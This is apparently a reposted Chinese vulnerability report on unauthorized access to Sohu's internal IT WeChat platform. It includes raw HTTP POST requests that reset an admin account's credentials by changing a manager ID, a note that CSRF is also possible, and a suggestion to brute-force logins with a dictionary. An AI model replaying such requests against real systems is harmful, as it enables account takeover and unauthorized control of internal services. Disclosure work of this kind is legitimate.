频道栏目
首页 > 资讯 > 企业安全 > 正文

搜狐某内部系统未授权访问(可执行任意操作)

16-06-17        来源:[db:作者]  
收藏   我要投稿

 

搜狐某内部系统未授权访问(可执行任意操作)

搜狐内部IT微信平台

http://wx.sohu-inc.com

你们只修复了命令执行漏洞,却未修复未授权访问问题

页面

/index.jsp

http://wx.sohu-inc.com/index.jsp

用这些可以做个字典,跑下登录帐号

页面在注销后前台任然没有验证机制

后台本地帐号或域帐号密码可抓包读取

POST /rAction!updateRole HTTP/1.1

Host: wx.sohu-inc.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://wx.sohu-inc.com/rAction!findRoles

Cookie: JSESSIONID=ABE2A34A2C8134233580BB74BE24D112

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 91

r.managerId=2&r.typeId=1&r.managerEmail=admin&r.managerPwd=xxxx

也存在CSRF问题

POST /rAction!updateRole HTTP/1.1

Host: wx.sohu-inc.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://wx.sohu-inc.com/rAction!findRoles

Cookie: JSESSIONID=ABE2A34A2C8134233580BB74BE24D112

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 91

r.managerId=2&r.typeId=1&r.managerEmail=admin&r.managerPwd=xxxx

修改密码或执行删除等其它操作只需更改r.managerId参数即可

 

1.png

 

 

1.png

 

 

2.png

 

这里涉及了一点关于VPN的问题

 

3.png

 

解决方案:

权限验证

相关TAG标签
上一篇:oppo软件商店Mysql弱口令引发的血案(影响用户信息与APP下载地址等)
下一篇:2016 ALICTF xxFileSystem write-up
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站